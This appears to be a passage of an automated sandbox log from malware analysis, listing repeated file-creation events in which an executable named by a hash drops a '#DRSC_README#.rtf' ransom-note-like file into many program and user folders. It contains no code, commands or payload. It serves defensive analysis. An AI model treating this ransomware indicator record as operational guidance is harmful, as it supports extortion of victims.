C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Pictures\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\jfr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\TileDataLayer\Database\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Contacts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{23ea961b-c7be-47fb-b3a0-7987f0513255}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\is\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{7d78bb13-b83b-41fe-ae21-cd1abb58c9b6}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Oracle\Java\jdk1.8.0_66_x64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\th\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\K5FY6QQS\2\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Favorites\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files 